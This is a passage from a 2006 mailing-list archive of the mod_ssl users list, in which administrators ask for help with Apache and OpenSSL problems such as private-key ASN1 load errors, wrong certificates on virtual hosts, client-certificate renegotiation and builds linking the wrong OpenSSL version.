[Mon May 22 21:56:26 2006] [error] OpenSSL: error:0D09A00D:asn1 encoding 
routines:d2i_PrivateKey:ASN1 lib

Someone can put me in the right direction where i have to lok to solve 
this error ?

--------------020008040200040108030902
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit




  
  


Phil Ehrens wrote:



  
Markus wrote:
  

  

    
Phil Ehrens wrote:

    

    

      
Markus wrote:


      

      

        
Made all the ca.key and the server.key and sign it via sign.sh everthing 
looked good so far.

then the misery begins.

./configure --with apache... --with-ssl --with-mm 
--with-crt=/var/local/certs --with -key=/var/local/private  
--prefix=../apache_1.3.35  --enabled-shared-ssl

Error:
cannot find SSL x.509 certificated file /var/local/certs
  

        

      

      
It wants the path to the cert, not to the directory containing
the cert. I wonder why they didn't use --with-cert for the
option name?!

      

    

    
I put that path in, however it still doesn't work. I put it in like this:
the certs and keys are in /usr/local/certs and /usr/local/private.
and i put in/usr/local/certs
and /usr/local/private
    

  

  

It wants something like:

/usr/local/certs/httpdcert.pem
                ^^^^^^^^^^^^^^
                      |
               filename of cert
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org


  



[Mon May 22 21:56:26 2006] [error] mod_ssl: Init: Private key not found
(OpenSSL library error follows)

[Mon May 22 21:56:26 2006] [error] OpenSSL: error:0D094068:asn1
encoding routines:d2i_ASN1_SET:bad tag

[Mon May 22 21:56:26 2006] [error] OpenSSL: error:0D0680A8:asn1
encoding routines:ASN1_CHECK_TLEN:wrong tag

[Mon May 22 21:56:26 2006] [error] OpenSSL: error:0D07803A:asn1
encoding routines:ASN1_ITEM_EX_D2I:nested asn1 error

[Mon May 22 21:56:26 2006] [error] OpenSSL: error:0D09A00D:asn1
encoding routines:d2i_PrivateKey:ASN1 lib



Someone can put me in the right direction where i have to lok to solve
this error ?




--------------020008040200040108030902--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May 23 20:10:21 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id DF74314D874; Tue, 23 May 2006 20:10:20 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from uranus.mp-software.com (194-158-249-204.static.adslpremium.ch [194.158.249.204])
	by master.modssl.org (Postfix) with ESMTP id A77EF14D860
	for ; Tue, 23 May 2006 20:10:17 +0200 (CEST)
Received: from [192.168.178.21] (194-158-249-204.static.adslpremium.ch [194.158.249.204])
	by uranus.mp-software.com (Postfix) with ESMTP id 4BDEAE4017F
	for ; Tue, 23 May 2006 20:10:16 +0200 (CEST)
Message-ID: <4473501F.5030508@sakrina.com>
Date: Tue, 23 May 2006 20:10:39 +0200
From: Markus 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.2) Gecko/20040804 Netscape/7.2 (ax)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To:  modssl-users@modssl.org
Subject: Re: ssl trouples
References: <4471D7E0.2040608@sakrina.com> <20060522154831.GA13301@ligo.caltech.edu> <4471E968.5090403@sakrina.com> <20060522171201.GA13969@ligo.caltech.edu> <4472CC89.2040204@sakrina.com>
In-Reply-To: <4472CC89.2040204@sakrina.com>
Content-Type: multipart/alternative;
 boundary="------------090807060909030607070506"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Markus 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.
--------------090807060909030607070506
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Markus wrote:

> Phil Ehrens wrote:
>
>>Markus wrote:
>>  
>>
>>>Phil Ehrens wrote:
>>>
>>>    
>>>
>>>>Markus wrote:
>>>>
>>>>
>>>>      
>>>>
>>>>>Made all the ca.key and the server.key and sign it via sign.sh everthing 
>>>>>looked good so far.
>>>>>
>>>>>then the misery begins.
>>>>>
>>>>>./configure --with apache... --with-ssl --with-mm 
>>>>>--with-crt=/var/local/certs --with -key=/var/local/private  
>>>>>--prefix=../apache_1.3.35  --enabled-shared-ssl
>>>>>
>>>>>Error:
>>>>>cannot find SSL x.509 certificated file /var/local/certs
>>>>>  
>>>>>
>>>>>        
>>>>>
>>>>It wants the path to the cert, not to the directory containing
>>>>the cert. I wonder why they didn't use --with-cert for the
>>>>option name?!
>>>>
>>>>      
>>>>
>>>I put that path in, however it still doesn't work. I put it in like this:
>>>the certs and keys are in /usr/local/certs and /usr/local/private.
>>>and i put in/usr/local/certs
>>>and /usr/local/private
>>>    
>>>
>>
>>It wants something like:
>>
>>/usr/local/certs/httpdcert.pem
>>                ^^^^^^^^^^^^^^
>>                      |
>>               filename of cert
>>______________________________________________________________________
>>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>User Support Mailing List                      modssl-users@modssl.org
>>Automated List Manager                            majordomo@modssl.org
>>
>>
>>  
>>
> [Mon May 22 21:56:26 2006] [error] mod_ssl: Init: Private key not 
> found (OpenSSL library error follows)
> [Mon May 22 21:56:26 2006] [error] OpenSSL: error:0D094068:asn1 
> encoding routines:d2i_ASN1_SET:bad tag
> [Mon May 22 21:56:26 2006] [error] OpenSSL: error:0D0680A8:asn1 
> encoding routines:ASN1_CHECK_TLEN:wrong tag
> [Mon May 22 21:56:26 2006] [error] OpenSSL: error:0D07803A:asn1 
> encoding routines:ASN1_ITEM_EX_D2I:nested asn1 error
> [Mon May 22 21:56:26 2006] [error] OpenSSL: error:0D09A00D:asn1 
> encoding routines:d2i_PrivateKey:ASN1 lib
>
> Someone can put me in the right direction where i have to lok to solve 
> this error ?

oopsy.. forgot to mention, this is in the apache error log.

--------------090807060909030607070506
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit




  
  


Markus wrote:


  
  
Phil Ehrens wrote:

  

    
Markus wrote:
  

    

      
Phil Ehrens wrote:

    

      

        
Markus wrote:


      

        

          
Made all the ca.key and the server.key and sign it via sign.sh everthing 
looked good so far.

then the misery begins.

./configure --with apache... --with-ssl --with-mm 
--with-crt=/var/local/certs --with -key=/var/local/private  
--prefix=../apache_1.3.35  --enabled-shared-ssl

Error:
cannot find SSL x.509 certificated file /var/local/certs
  

        

        

        
It wants the path to the cert, not to the directory containing
the cert. I wonder why they didn't use --with-cert for the
option name?!

      

      

      
I put that path in, however it still doesn't work. I put it in like this:
the certs and keys are in /usr/local/certs and /usr/local/private.
and i put in/usr/local/certs
and /usr/local/private
    

    

    

It wants something like:

/usr/local/certs/httpdcert.pem
                ^^^^^^^^^^^^^^
                      |
               filename of cert
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org


  

  

[Mon May 22 21:56:26 2006] [error] mod_ssl: Init: Private key not found
(OpenSSL library error follows)

[Mon May 22 21:56:26 2006] [error] OpenSSL: error:0D094068:asn1
encoding routines:d2i_ASN1_SET:bad tag

[Mon May 22 21:56:26 2006] [error] OpenSSL: error:0D0680A8:asn1
encoding routines:ASN1_CHECK_TLEN:wrong tag

[Mon May 22 21:56:26 2006] [error] OpenSSL: error:0D07803A:asn1
encoding routines:ASN1_ITEM_EX_D2I:nested asn1 error

[Mon May 22 21:56:26 2006] [error] OpenSSL: error:0D09A00D:asn1
encoding routines:d2i_PrivateKey:ASN1 lib

  

Someone can put me in the right direction where i have to lok to solve
this error ?



oopsy.. forgot to mention, this is in the apache error log.




--------------090807060909030607070506--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May 24 20:18:22 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 1FAF414D874; Wed, 24 May 2006 20:18:22 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smtp-vbr4.xs4all.nl (smtp-vbr4.xs4all.nl [194.109.24.24])
	by master.modssl.org (Postfix) with ESMTP id 77F8B14D82B
	for ; Wed, 24 May 2006 20:18:20 +0200 (CEST)
Received: from [192.168.1.15] (waxtrapp.xs4all.nl [80.127.29.36])
	(authenticated bits=0)
	by smtp-vbr4.xs4all.nl (8.13.6/8.13.6) with ESMTP id k4OIIKIU082050;
	Wed, 24 May 2006 20:18:20 +0200 (CEST)
	(envelope-from frank.van.beek@waxtrapp.com)
Message-ID: <4474A36A.6070203@waxtrapp.com>
Date: Wed, 24 May 2006 20:18:18 +0200
From: Frank van Beek 
User-Agent: Thunderbird 1.5 (Windows/20051201)
MIME-Version: 1.0
To: modssl-users@modssl.org
CC: Louis Nagtegaal ,
        Bas Groot ,
        Bas van Eck 
Subject: Apache sends wrong certificate
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
X-Virus-Scanned: by XS4ALL Virus Scanner
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Frank van Beek 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi all,

This morning we migrated 4 of our websites to a new server. Each of 
these websites uses a certificate for https connections. We've got only 
one Apache instance running with 4 virtual hosts on 4 different 
IP-addresses.

This worked fine on the old server. But since the move this morning 
Apache sends the certificate for the first VirtualHost to all 4 
IP-addresses. Two of these sites need an additional 
SSLCertificateChainFile, and this file is send *correctly* depending on 
the IP-address. So Apache does see 4 different VirtualHosts, but somehow 
ignores the individual SSLCertificateFiles.

Here is the relevant part of httpd.conf for these 4 hosts:

-----
     Listen xxx.xxx.198.62:443
     NameVirtualHost xxx.xxx.198.62:443

     
         SSLEngine On
         SSLCertificateChainFile      chain1
         SSLCertificateFile           crt1
         SSLCertificateKeyFile        key1
     

     Listen xxx.xxx.198.61:443
     NameVirtualHost xxx.xxx.198.61:443

     
         SSLEngine On
         SSLCertificateChainFile      chain2
         SSLCertificateFile           crt2
         SSLCertificateKeyFile        key2
     

     Listen xxx.xxx.198.63:443
     NameVirtualHost xxx.xxx.198.63:443

     
         SSLEngine On
         SSLCertificateFile           crt3
         SSLCertificateKeyFile        key3
     

     Listen xxx.xxx.198.64:443
     NameVirtualHost xxx.xxx.198.64:443

     
         SSLEngine On
         SSLCertificateFile           crt4
         SSLCertificateKeyFile        key4
     
-----

The old server is still up and running. I've upgraded Apache on that 
system to the same version (2.0.58) and copied httpd.conf to that 
machine. The above configuration somehow works correctly there.

I've been trying to debug this using "openssl s_client -state -connect" 
and I do see some relevant differences, but I've been unable to 
interpret them.

I know this report lacks a lot of possibly relevant details. But I 
didn't want to send the whole httpd.conf and all of the terminal output 
to this list.

Is there an obvious mistake in my configuration? Or have I stumbled on a 
bug in Apache 2.0.58?

Met groet,

Frank.
-- 
Frank van Beek

WAXTRAPP BV
van Diemenstraat 366
1013CR Amsterdam
The Netherlands

Phone:  +31 (0)20 672 2308
Fax:    +31 (0)20 672 2488

http://www.waxtrapp.com
frank.van.beek@waxtrapp.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 26 21:47:06 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 28AB814D8A5; Fri, 26 May 2006 21:47:06 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from uranus.mpsoftware.com (194-158-249-204.static.adslpremium.ch [194.158.249.204])
	by master.modssl.org (Postfix) with ESMTP id 613BA14D82B
	for ; Fri, 26 May 2006 21:47:04 +0200 (CEST)
Received: from [192.168.178.21] (194-158-249-204.static.adslpremium.ch [194.158.249.204])
	by uranus.mpsoftware.com (Postfix) with ESMTP id 555AA3C0998
	for ; Fri, 26 May 2006 21:47:02 +0200 (CEST)
Message-ID: <44775B47.3080703@sakrina.com>
Date: Fri, 26 May 2006 21:47:19 +0200
From: Markus 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.2) Gecko/20040804 Netscape/7.2 (ax)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To:  modssl-users@modssl.org
Subject: question SSL troupling
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Markus 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

[Fri May 26 18:07:14 2006] [warn] Loaded DSO libexec/mod_env.so uses 
plain Apache 1.3 API, this module might crash under EAPI! (please 
recompile it with -DEAPI)
[Fri May 26 18:07:14 2006] [warn] Loaded DSO libexec/mod_mime.so uses 
plain Apache 1.3 API, this module might crash under EAPI! (please 
recompile it with -DEAPI)
[Fri May 26 18:07:14 2006] [warn] Loaded DSO libexec/mod_negotiation.so 
uses plain Apache 1.3 API, this module might crash under EAPI! (please 
recompile it with -DEAPI)
[Fri May 26 18:07:14 2006] [warn] Loaded DSO libexec/mod_include.so uses 
plain Apache 1.3 API, this module might crash under EAPI! (please 
recompile it with -DEAPI)
[Fri May 26 18:07:14 2006] [warn] Loaded DSO libexec/mod_autoindex.so 
uses plain Apache 1.3 API, this module might crash under EAPI! (please 
recompile it with -DEAPI)
[Fri May 26 18:07:14 2006] [warn] Loaded DSO libexec/mod_dir.so uses 
plain Apache 1.3 API, this module might crash under EAPI! (please 
recompile it with -DEAPI)
[Fri May 26 18:07:14 2006] [warn] Loaded DSO libexec/mod_cgi.so uses 
plain Apache 1.3 API, this module might crash under EAPI! (please 
recompile it with -DEAPI)
[Fri May 26 18:07:14 2006] [warn] Loaded DSO libexec/mod_asis.so uses 
plain Apache 1.3 API, this module might crash under EAPI! (please 
recompile it with -DEAPI)
[Fri May 26 18:07:14 2006] [warn] Loaded DSO libexec/mod_imap.so uses 
plain Apache 1.3 API, this module might crash under EAPI! (please 
recompile it with -DEAPI)
[Fri May 26 18:07:14 2006] [warn] Loaded DSO libexec/mod_actions.so uses 
plain Apache 1.3 API, this module might crash under EAPI! (please 
recompile it with -DEAPI)
[Fri May 26 18:07:14 2006] [warn] Loaded DSO libexec/mod_userdir.so uses 
plain Apache 1.3 API, this module might crash under EAPI! (please 
recompile it with -DEAPI)
[Fri May 26 18:07:14 2006] [warn] Loaded DSO libexec/mod_alias.so uses 
plain Apache 1.3 API, this module might crash under EAPI! (please 
recompile it with -DEAPI)
[Fri May 26 18:07:14 2006] [warn] Loaded DSO libexec/mod_access.so uses 
plain Apache 1.3 API, this module might crash under EAPI! (please 
recompile it with -DEAPI)
[Fri May 26 18:07:14 2006] [warn] Loaded DSO libexec/mod_auth.so uses 
plain Apache 1.3 API, this module might crash under EAPI! (please 
recompile it with -DEAPI)
[Fri May 26 18:07:14 2006] [warn] Loaded DSO libexec/mod_setenvif.so 
uses plain Apache 1.3 API, this module might crash under EAPI! (please 
recompile it with -DEAPI)
[Fri May 26 18:07:14 2006] [warn] Loaded DSO libexec/mod_vhost_alias.so 
uses plain Apache 1.3 API, this module might crash under EAPI! (please 
recompile it with -DEAPI)
[Fri May 26 18:07:14 2006] [warn] Loaded DSO libexec/libphp4.so uses 
plain Apache 1.3 API, this module might crash under EAPI! (please 
recompile it with -DEAPI)
*******************************************
[Fri May 26 18:24:47 2006] [notice] Apache/1.3.36 (Unix) PHP/4.4.2 
configured -- resuming normal operations
[Fri May 26 18:24:47 2006] [notice] Accept mutex: sysvsem (Default: sysvsem)
[Fri May 26 18:27:00 2006] [error] mod_ssl: Init: Private key not found 
(OpenSSL library error follows)
[Fri May 26 18:27:00 2006] [error] OpenSSL: error:0D094068:asn1 encoding 
routines:d2i_ASN1_SET:bad tag
[Fri May 26 18:27:00 2006] [error] OpenSSL: error:0D0680A8:asn1 encoding 
routines:ASN1_CHECK_TLEN:wrong tag
[Fri May 26 18:27:00 2006] [error] OpenSSL: error:0D07803A:asn1 encoding 
routines:ASN1_ITEM_EX_D2I:nested asn1 error
[Fri May 26 18:27:00 2006] [error] OpenSSL: error:0D09A00D:asn1 encoding 
routines:d2i_PrivateKey:ASN1 lib

Any hint what is wrong ?
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat May 27 02:01:49 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id CC5B914D8A5; Sat, 27 May 2006 02:01:49 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from motgate8.mot.com (motgate8.mot.com [129.188.136.8])
	by master.modssl.org (Postfix) with ESMTP id 3D0AD14D838
	for ; Sat, 27 May 2006 02:01:48 +0200 (CEST)
Received: from il06exr04.mot.com (il06exr04.mot.com [129.188.137.134])
	by motgate8.mot.com (8.12.11/Motgate7) with ESMTP id k4R01egw006693
	for ; Fri, 26 May 2006 17:01:44 -0700 (MST)
Received: from tx14exm60.ds.mot.com (TX14EXM60.ftw.mot.com [10.63.147.60])
	by il06exr04.mot.com (8.13.1/8.13.0) with ESMTP id k4R01dv5013476
	for ; Fri, 26 May 2006 19:01:40 -0500 (CDT)
X-MimeOLE: Produced By Microsoft Exchange V6.5
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Subject: SSL Handshake Re-negotiation
Date: Fri, 26 May 2006 19:01:39 -0500
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: SSL Handshake Re-negotiation
thread-index: AcaBILpkchi6oXrRQN+UZG/4JcCISA==
From: "KRISHNAMURTHY SUDHAKAR-FSK031" 
To: 
X-Brightmail-Tracker: AAAAAQAAAAQ=
X-White-List-Member: TRUE
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "KRISHNAMURTHY SUDHAKAR-FSK031" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I have a Apache server that is configured to authenticate clients for a
certain URL while the other clients are not authenticated. Here's  how
my vhost.conf file looks like
=20

=20
#  General setup for the virtual host
DocumentRoot "C:/Program Files/Myserver/myfiles"
ServerName Myserver.server.com:443
ServerAdmin admin@server.com
ErrorDocument 401 /loginerror.htm
ErrorLog logs/error.log
TransferLog logs/access.log
=20

SSLEngine on
=20
SSLCipherSuite
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
=20
SSLCertificateFile conf/ssl/my.crt
=20
SSLCertificateKeyFile conf/ssl/my.key
=20
SSLCertificateChainFile conf/ssl/my.crt
=20
SSLCACertificateFile conf/ssl/root.crt
=20

SSLVerifyClient require
SSLVerifyDepth  1

=20

    SSLOptions +StdEnvVars


    SSLOptions +StdEnvVars

=20

SetEnvIf User-Agent ".*MSIE.*" \
         nokeepalive ssl-unclean-shutdown \
         downgrade-1.0 force-response-1.0
=20
CustomLog logs/ssl_request_log \
          "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"
=20
=20

Now when a client is trying to get a file from /myServlet/FileServlet/
location I expect the server to send a request to obtain the client
certificate, while if the client is attempting to get a file from other
locations no client authentication should be performed.

The behavior I am seeing is when the client comes in to the secure
location with a  HTTPS GET request, SSL handshake occurs without the
server requesting for certificate, then I see that the HTTP GET request
coming through to HTTP layer and then the server initiates another SSL
handshake(re-negotiation) during which the server is requesting for the
client certificate.

My client is NOT a browser, it's a HTTPS client in C developed by
someone else to support few basic HTTP commands. Now my question is, is
this the standard behavior or should the server be requesting the
certificate in the first SSL handshake process??

If this is not the standard way of handling then is their something in
the apache configuration that I am missing.

Can someone please help me out.
TIA

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat May 27 09:33:39 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 2C81114D8A6; Sat, 27 May 2006 09:33:39 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web51010.mail.yahoo.com (web51010.mail.yahoo.com [206.190.39.129])
	by master.modssl.org (Postfix) with SMTP id 8E59114D838
	for ; Sat, 27 May 2006 09:33:38 +0200 (CEST)
Received: (qmail 82187 invoked by uid 60001); 27 May 2006 07:33:34 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.com;
  h=Message-ID:Received:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type:Content-Transfer-Encoding;
  b=pdihZC6Xd4OB02xDvrr1qGDJUDr3w7nos2qTOYLGO+WrsS1jzocM8341X8lF9G2I+E2bIEb2quGmQVHkoa/JfaEmFiwtph4LrI2L8sVmvvEkTZWzD2LyzkBKwWxO06WizuVinT3xQB+XVJ8eH3S6V436Bxg0m6QOMRGAk6G1xDk=  ;
Message-ID: <20060527073334.82185.qmail@web51010.mail.yahoo.com>
Received: from [66.159.202.206] by web51010.mail.yahoo.com via HTTP; Sat, 27 May 2006 00:33:34 PDT
Date: Sat, 27 May 2006 00:33:34 -0700 (PDT)
From: Zareh 
Subject: Re: Welcome to modssl-users
To: modssl-users@modssl.org
In-Reply-To: <20060527072154.C04CF14D8A7@master.modssl.org>
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Zareh 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I upgraded an old installation of apache 1.3.26 with Openssl 0.9.6/mod_ssl-2.8.10 to OpenSSL
0.9.8b/mod_ssl-2.8.27 + Apache 1.3.36, but it seems that mod_ssl is still compling against 0.9.6.

When I do a GET the server returns:
Server: Apache/1.3.36 (Unix) mod_ssl/2.8.27 OpenSSL/0.9.6

Even though the 'configure' script for mod_ssl tells me that it will use OpenSSL0.9.8b:

# ./configure --with-apache=../apache_1.3.36 --with-ssl=/usr/local/ssl
Configuring mod_ssl/2.8.27 for Apache/1.3.36
 + Apache location: ../apache_1.3.36 (Version 1.3.36)
 + OpenSSL location: /usr/local/ssl
 + Auxiliary patch tool: ./etc/patch/patch (local)
 + Applying packages to Apache source tree:
   o Extended API (EAPI)
   o Distribution Documents
   o SSL Module Source
   o SSL Support
   o SSL Configuration Additions
   o SSL Module Documentation
   o Addons
Done: source extension and patches successfully applied.

Configuring for Apache, Version 1.3.36
 + using installation path layout: Apache (config.layout)
Creating Makefile
Creating Configuration.apaci in src
Creating Makefile in src
 + configured for Solaris 280 platform
 + setting C compiler to gcc
 + setting C pre-processor to gcc -E
 + using "tr [a-z] [A-Z]" to uppercase
 + checking for system header files
 + adding selected modules
    o ssl_module uses ConfigStart/End
      + SSL interface: mod_ssl/2.8.27
      + SSL interface build type: OBJ
      + SSL interface compatibility: enabled
      + SSL interface experimental code: disabled
      + SSL interface conservative code: disabled
      + SSL interface vendor extensions: disabled
      + SSL interface plugin: Vendor DBM (libc)
      + SSL library path: /usr/local/ssl
      + SSL library version: OpenSSL 0.9.8b 04 May 2006
      + SSL library type: installed package (stand-alone)
 + enabling Extended API (EAPI)
 + using builtin Expat
 + checking sizeof various data types
 + doing sanity check on compiler and options

The previous installation of openssl was also in /usr/local/ssl, I've installed the current
version of OpenSSL in the same directory: 

# /usr/local/ssl/bin/openssl version
OpenSSL 0.9.8b 04 May 2006

I'd really appreciate some help in this area, I'm going to spend my weekend upgrading a few old
installations, but it seems that I'll be spending the majority of memorial weekend compiling and
recompiling.

Thanks

__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat May 27 14:58:10 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 5F5BD14D8A6; Sat, 27 May 2006 14:58:10 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from uranus.mpsoftware.com (194-158-249-204.static.adslpremium.ch [194.158.249.204])
	by master.modssl.org (Postfix) with ESMTP id 160C614D838
	for ; Sat, 27 May 2006 14:58:09 +0200 (CEST)
Received: from [192.168.178.21] (194-158-249-204.static.adslpremium.ch [194.158.249.204])
	by uranus.mpsoftware.com (Postfix) with ESMTP id D81AB3C0998
	for ; Sat, 27 May 2006 14:58:07 +0200 (CEST)
Message-ID: <44784D0C.7000308@sakrina.com>
Date: Sat, 27 May 2006 14:58:52 +0200
From: Markus 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.2) Gecko/20040804 Netscape/7.2 (ax)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To:  modssl-users@modssl.org
Subject: Re: question SSL troupling
References: <44775B47.3080703@sakrina.com>
In-Reply-To: <44775B47.3080703@sakrina.com>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Markus 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

or another question does someone have a complet UBER noob step be step 
guide to install mod_ssl on a apache1.3.36 with php4.4.2 and mysql 
4.1.19-standart log?
But must be a real uber noob step be step, becouse im even below an uber 
noob status.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat May 27 21:29:32 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 8F6FC14D8A6; Sat, 27 May 2006 21:29:32 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from uranus.mpsoftware.com (194-158-249-204.static.adslpremium.ch [194.158.249.204])
	by master.modssl.org (Postfix) with ESMTP id 3361D14D838
	for ; Sat, 27 May 2006 21:29:31 +0200 (CEST)
Received: from [192.168.178.21] (194-158-249-204.static.adslpremium.ch [194.158.249.204])
	by uranus.mpsoftware.com (Postfix) with ESMTP id 2DA653C0998
	for ; Sat, 27 May 2006 21:29:30 +0200 (CEST)
Message-ID: <4478A8C0.5090008@sakrina.com>
Date: Sat, 27 May 2006 21:30:08 +0200
From: Markus 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.2) Gecko/20040804 Netscape/7.2 (ax)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To:  modssl-users@modssl.org
Subject: Re: question SSL troupling
References: <44775B47.3080703@sakrina.com> <44784D0C.7000308@sakrina.com>
In-Reply-To: <44784D0C.7000308@sakrina.com>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Markus 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Okay got everthing working. Except images.

On any page what uses images they dont show.
They show perfect in http but not in https.

the call is: https://xxx/image.gif

if I paste the image into the browser direct it shows, but not via the 
page? any hint ?
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat May 27 21:56:03 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 5DC2614D8A6; Sat, 27 May 2006 21:56:03 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from uranus.mpsoftware.com (194-158-249-204.static.adslpremium.ch [194.158.249.204])
	by master.modssl.org (Postfix) with ESMTP id 12C9814D838
	for ; Sat, 27 May 2006 21:56:02 +0200 (CEST)
Received: from [192.168.178.21] (194-158-249-204.static.adslpremium.ch [194.158.249.204])
	by uranus.mpsoftware.com (Postfix) with ESMTP id 3AD7A3C0998
	for ; Sat, 27 May 2006 21:56:01 +0200 (CEST)
Message-ID: <4478AF02.6040009@sakrina.com>
Date: Sat, 27 May 2006 21:56:50 +0200
From: Markus 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.2) Gecko/20040804 Netscape/7.2 (ax)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To:  modssl-users@modssl.org
Subject: Re: question SSL troupling
